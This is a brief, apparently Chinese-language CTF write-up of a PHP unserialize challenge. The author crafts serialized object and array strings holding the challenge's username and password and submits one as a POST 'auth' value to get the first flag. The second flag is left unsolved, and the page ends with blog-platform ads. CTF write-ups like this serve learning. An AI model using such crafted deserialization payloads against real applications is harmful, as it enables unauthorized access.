御林babyunserialize
O:4:"auth":2:{s:8:"username";s:8:"YulinSec";s:6:"passwd";s:22:"i_love_php_unserialize";}
FLAG1
<?php
class auth{
var $username = "YulinSec";
var $passwd = 'i_love_php_unserialize';
}
$example = new auth();
$SerialString = serialize($example);
echo $SerialString; #输出
?>
原来是数组序列化
对象序列化不行
a:2:{i:username;s:8:"YulinSec";i:passwd;s:22:"i_love_php_unserialize";}
我逐渐理解了一切
<?php
class auth{
var $username = "YulinSec";
var $passwd = 'i_love_php_unserialize';
}
$example = new auth();
$SerialString = serialize($example);
echo $SerialString; #输出
$a = unserialize('a:2:{i:0;s:8:"YulinSec";i:1;s:22:"i_love_php_unserialize";}');
# echo $a[0];
# echo $a[1];
$arr = [
'username' => 'YulinSec',
'passwd' => 'i_love_php_unserialize',
];
# echo $arr['username'];
# echo $arr['passwd'];
$b = serialize($arr);
echo $b
?>
auth=a:2:{s:8:"username";s:8:"YulinSec";s:6:"passwd";s:22:"i_love_php_unserialize";}
POST数据
得到flag1
FLAG2,没做出来
Data数据传输对象包含getflag(),方法内容为echo()
思路就是这样,在线编辑启动!
不小心忘了,方法不能直接序列化
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· DeepSeek 开源周回顾「GitHub 热点速览」
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了